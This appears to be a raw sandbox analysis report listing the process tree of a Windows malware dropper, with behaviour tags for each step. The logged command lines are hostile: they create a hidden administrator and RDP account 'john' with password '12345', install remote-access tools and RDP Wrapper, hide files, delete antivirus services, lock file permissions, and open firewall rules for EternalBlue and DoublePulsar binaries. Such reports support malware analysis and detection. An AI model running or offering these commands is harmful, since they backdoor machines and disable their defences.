attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
2404	attrib.exe
5992	attrib.exe
5972	attrib.exe
5204	attrib.exe
5164	attrib.exe
5696	attrib.exe
5236	attrib.exe
3540	attrib.exe
6068	attrib.exe
5644	attrib.exe
6028	attrib.exe
5784	attrib.exe
1816	attrib.exe
1444	attrib.exe
4164	attrib.exe
4032	attrib.exe
5360	attrib.exe
5448	attrib.exe
5648	attrib.exe
5368	attrib.exe
5304	attrib.exe
2164	attrib.exe
4600	attrib.exe
4160	attrib.exe
4008	attrib.exe
5440	attrib.exe
3792	attrib.exe
5548	attrib.exe
4276	attrib.exe
5284	attrib.exe
4968	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe

"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"

Drops file in Drivers directory
Adds Run key to start application
Checks whether UAC is enabled
Modifies WinLogon
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification

PID:644

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

Executes dropped EXE
Modifies registry class
Suspicious use of WriteProcessMemory

PID:3032

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

Suspicious use of WriteProcessMemory

PID:1524

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

Suspicious use of WriteProcessMemory

PID:1528

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

Runs .reg file with regedit

PID:1836

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

Runs .reg file with regedit

PID:3548

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:2208

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:3860

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:356

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:2616

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows\*.*

Views/modifies file attributes

PID:4032

C:\Windows\SysWOW64\attrib.exe

ATTRIB +H +S C:\Programdata\Windows

Views/modifies file attributes

PID:2164

C:\Windows\SysWOW64\sc.exe

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000

PID:3916

C:\Windows\SysWOW64\sc.exe

sc config RManService obj= LocalSystem type= interact type= own

PID:2240

C:\Windows\SysWOW64\sc.exe

sc config RManService DisplayName= "Microsoft Framework"

PID:1544

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

Executes dropped EXE
Checks processor information in registry
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:3304

C:\Program Files (x86)\Windows Mail\WinMail.exe

"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE

Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:3928

C:\Program Files\Windows Mail\WinMail.exe

"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

Suspicious use of SetWindowsHookEx

PID:3312

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat

PID:756

C:\Windows\SysWOW64\timeout.exe

timeout 5

Delays execution with timeout.exe

PID:2408

C:\ProgramData\install\sys.exe

C:\ProgramData\install\sys.exe

Executes dropped EXE
Loads dropped DLL
Checks processor information in registry
Suspicious use of WriteProcessMemory

PID:3028

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"

Suspicious use of WriteProcessMemory

PID:3124

C:\Windows\SysWOW64\timeout.exe

C:\Windows\system32\timeout.exe 3

Delays execution with timeout.exe

PID:1028

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

Executes dropped EXE

PID:2180

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

Drops file in Drivers directory
Executes dropped EXE
Drops file in Program Files directory
Drops file in Windows directory
Suspicious use of SetWindowsHookEx

PID:1968

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

Executes dropped EXE
Adds Run key to start application
NTFS ADS
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx

PID:3356

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

Executes dropped EXE
Suspicious use of SetWindowsHookEx

PID:3160

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

PID:2116

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

PID:1872

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

PID:4304

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

Gathers network information

PID:4392

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

PID:4432

C:\Windows\system32\gpupdate.exe

gpupdate /force

PID:4532

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

PID:4048

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)

Modifies file permissions

PID:396

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

PID:3404

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)

PID:1500

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

PID:3840

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)

PID:2060

C:\programdata\microsoft\intel\R8.exe

C:\programdata\microsoft\intel\R8.exe

Executes dropped EXE
Modifies registry class
Suspicious use of SetWindowsHookEx

PID:820

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"

PID:3224

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "

Modifies registry class

PID:2032

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill

PID:2036

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill

PID:3412

C:\Windows\SysWOW64\timeout.exe

timeout 3

Delays execution with timeout.exe

PID:2148

C:\Windows\SysWOW64\chcp.com

chcp 1251

PID:1532

C:\rdp\Rar.exe

"Rar.exe" e -p555 db.rar

Executes dropped EXE

PID:3848

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im Rar.exe

Kills process with taskkill

PID:1932

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:4156

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"

PID:4820

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "

PID:4944

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f

PID:5032

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f

PID:5080

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow

PID:5108

C:\Windows\SysWOW64\net.exe

net.exe user "john" "12345" /add

PID:4176

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

PID:4128

C:\Windows\SysWOW64\chcp.com

chcp 1251

PID:2572

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

PID:4728

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

PID:4180

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

PID:4980

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

PID:2288

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

PID:5024

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

PID:4380

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

PID:4684

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

PID:4636

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

PID:4988

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

PID:4524

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

PID:4396

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

PID:4280

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

PID:4116

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

PID:4596

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

PID:748

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

PID:864

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

PID:4552

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

PID:4744

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

Executes dropped EXE
Modifies WinLogon
Drops file in Program Files directory

PID:4756

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

PID:5960

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

Executes dropped EXE

PID:4672

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

PID:4540

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

PID:4664

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

PID:4616

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

Drops file in Program Files directory
Views/modifies file attributes

PID:1444

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

Drops file in Program Files directory
Views/modifies file attributes

PID:4600

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

Views/modifies file attributes

PID:5236

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:4840

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

PID:752

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

PID:2220

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

PID:1004

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

PID:3308

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

PID:3812

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

PID:1372

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

PID:3312

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

PID:3468

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

PID:2236

C:\Windows\SysWOW64\sc.exe

sc delete swprv

PID:3868

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

PID:2348

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

PID:4108

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

PID:4168

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

PID:4220

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

PID:4240

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

PID:4284

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

PID:4348

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

PID:4404

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

PID:4440

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

PID:4520

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

PID:4580

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

PID:4624

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

PID:4648

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

PID:4692

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

PID:4716

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

PID:4872

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

PID:4732

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

PID:4900

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

PID:4976

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

PID:5056

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

PID:2260

C:\Windows\SysWOW64\sc.exe

sc stop clr_optimization_v4.0.30318_64

PID:1036

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

PID:2720

C:\Windows\SysWOW64\sc.exe

sc delete clr_optimization_v4.0.30318_64"

PID:4200

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql

PID:4188

C:\Windows\SysWOW64\sc.exe

sc stop MicrosoftMysql

PID:4264

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql

PID:2204

C:\Windows\SysWOW64\sc.exe

sc delete MicrosoftMysql

PID:4528

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

PID:4400

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

PID:4556

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

PID:4376

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

PID:4480

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

PID:888

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

PID:4592

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

PID:4700

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

PID:4660

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

PID:4828

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

PID:4736

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:4920

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:5088

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:5104

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:4224

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:1140

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:4288

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes

PID:4492

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:4340

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes

PID:4804

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4748

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes

PID:4940

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

PID:4668

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes

PID:4772

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

PID:4204

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes

PID:4824

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

PID:4244

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes

PID:4364

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

PID:4212

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes

PID:4832

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

PID:4360

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes

PID:4800

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

PID:4352

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes

PID:4908

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

PID:4704

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN

PID:4776

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

PID:5068

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN

PID:4416

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

PID:2248

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out

PID:4104

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

PID:4196

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out

PID:4688

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

PID:4332

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255

PID:4852

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

PID:3676

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255

PID:868

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

PID:4208

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255

PID:4584

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

PID:5084

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255

PID:4304

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

PID:4344

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255

PID:4928

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

PID:4796

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255

PID:4184

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

PID:4236

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255

PID:3856

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

PID:4788

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255

PID:4848

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

PID:4912

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255

PID:4676

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

PID:5116

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248

PID:4808

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

PID:4320

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255

PID:2932

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

PID:5100

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255

PID:4272

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

PID:5048

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255

PID:1624

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

PID:5112

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255

PID:4084

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

PID:5092

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113

PID:5052

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

PID:4656

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113

PID:4192

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

PID:4784

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72

PID:4232

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

PID:4932

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72

PID:4760

C:\Windows\SysWOW64\cmd.exe

